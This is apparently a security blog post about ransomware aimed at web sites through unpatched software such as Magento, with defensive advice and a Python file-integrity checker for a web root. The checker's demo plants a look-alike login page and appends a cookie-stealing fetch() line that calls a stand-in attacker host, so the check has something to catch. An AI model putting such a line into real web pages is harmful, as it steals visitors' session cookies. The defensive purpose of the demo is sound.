It might be a fair fight if companies would do just a few of the right things, but for a lot of them, they do not.
There is a form of ransomware going around now that attacks web sites rather than workstations. Encrypting all the data on your web site will probably make you willing to pay a bigger ransom than Joe’s PC in the marketing department would. This particular attack doesn’t try to compromise the operating system; it goes after buggy web applications, plugins and addons that companies don’t seem to be able to patch. In the case described by Brian Krebs on his blog, the ransomware gets onto the server through those vulnerable applications. One the attackers are going after is Magento, a widely used e-commerce (shopping cart) platform. A patch was released in February of this year and the vulnerability was publicly disclosed in April, but many web sites still haven’t installed the patch. PATCHING JUST THE OPERATING SYSTEM IS NOT ENOUGH – YOU HAVE TO PATCH EACH AND EVERY TOOL THAT YOU USE AND YOU HAVE TO DO IT QUICKLY.
For some ransomware victims, the problem is even bigger. Apparently the Power Worm ransomware has a bug in it so that even if you pay the ransom, the attacker is unable to decrypt your files.
Given that this is your web site, having it offline, even for hours (and if you don’t have good backups, then maybe for days or more) is likely a problem for your business.
Now back to how the hackers get in.
They use the unpatched vulnerabilities to break into your own company’s web site. Then they add a new page that looks like all of the other pages on your site. Finally, they phish your employees with a link to that page on your own company’s web site (a domain your employees and your mail filters already trust) and poof, they are in. Once they control one machine, they escalate their privileges and move laterally across your network. It can happen VERY quickly.
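One check that catches the "add a new page" step is a file-integrity baseline of the web root: hash every file, and then keep comparing the live tree against that baseline so that a planted page or a tampered script shows up as soon as it lands. The script below is an added example, not code from the original post or from the Krebs article it cites; the sample site contents, the planted login page and the `attacker.invalid` host are constructed for the demonstration.

```python
"""Added example: minimal file-integrity check for a web root.

Builds a baseline of SHA-256 hashes for every file under a directory and
reports files that were added, modified or removed since the baseline,
which is how a planted phishing page or a backdoored script shows up.
All paths and content here are constructed sample data.
"""
import hashlib
import os
import tempfile

# Constructed sample web root: relative path -> file content.
SAMPLE_SITE = {
    "index.html": "<html><body>Welcome</body></html>\n",
    "about.html": "<html><body>About us</body></html>\n",
    "js/app.js": "console.log('hi');\n",
}


def sha256_file(path, chunk=65536):
    """Hash a file in fixed-size chunks so large uploads don't sit in memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(chunk), b""):
            h.update(block)
    return h.hexdigest()


def snapshot(root):
    """Map every file under root (POSIX-style relative path) to its SHA-256."""
    result = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            result[rel] = sha256_file(full)
    return result


def diff_snapshots(baseline, current):
    """Return sorted lists of added, modified and removed relative paths."""
    added = sorted(p for p in current if p not in baseline)
    removed = sorted(p for p in baseline if p not in current)
    modified = sorted(
        p for p in current if p in baseline and current[p] != baseline[p]
    )
    return {"added": added, "modified": modified, "removed": removed}


def write_site(root, files):
    """Write the sample files, creating subdirectories as needed."""
    for rel, content in files.items():
        full = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w", encoding="utf-8") as f:
            f.write(content)


def demo():
    """Replay the attack from the post against a throwaway web root.

    Take a baseline, then plant a look-alike login page and append a
    cookie-stealing line to an existing script; return what the diff sees.
    """
    with tempfile.TemporaryDirectory() as root:
        write_site(root, SAMPLE_SITE)
        baseline = snapshot(root)
        # Attacker adds a page that blends in with the rest of the site...
        write_site(root, {
            "account/login.html": "<html><body>Sign in</body></html>\n",
        })
        # ...and backdoors a script that every page already loads.
        with open(os.path.join(root, "js", "app.js"), "a", encoding="utf-8") as f:
            f.write("fetch('https://attacker.invalid/?c=' + document.cookie);\n")
        return diff_snapshots(baseline, snapshot(root))


if __name__ == "__main__":
    for kind, paths in demo().items():
        for p in paths:
            print(f"{kind.upper():9}{p}")
```

In production the baseline would be written at deploy time and stored off the web server (an attacker who can write to the web root can also rewrite a baseline kept beside it), and the comparison would run on a schedule measured in minutes, not once or twice a year. Expect a legitimate deploy to show up as "modified" too, so the check has to be re-baselined as part of the release process rather than silenced.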
So, what mistakes do companies make?
- Underestimating the risk of insecure web applications. Avoiding this means having a secure development life cycle, testing your applications and applying patches, among other things.
- Lack of continuous monitoring. If you are not watching what is going on in your network in real time, you have made it pretty easy for the attackers. Testing your web site once or even twice a year is a guaranteed fail.
- Lack of a disaster recovery, business continuity and incident response plan. If you don’t plan for it and don’t test the plan, then when the kaka hits the rotating-air-movement-devices (aka when the sh*t hits the fan), you will be that proverbial deer in the headlights.
- If convenience, or the features that marketing wants, always wins out over security, then you give the hackers a free pass. That does not mean that security always wins, but you need a clear process for evaluating security issues and understanding which risks you are willing to accept and which you are not.
- Not dealing with third party security issues. Whether it is vendor risk management (think the Target, Home Depot or OPM breaches) or third party software bugs (like the Magento bug described above), problems with a third party are your problems, and if your contracts are not written correctly, you probably don’t even have any recourse to go after them for damages. Most software licenses say the vendor does not warrant that the software works correctly – you use it at your own risk. If that software (or a third party vendor) lets a hacker in, good luck getting any money out of them.
So this is an opportunity to tighten things up and make it a little harder for the bad guys. Maybe they will go after some other company rather than yours.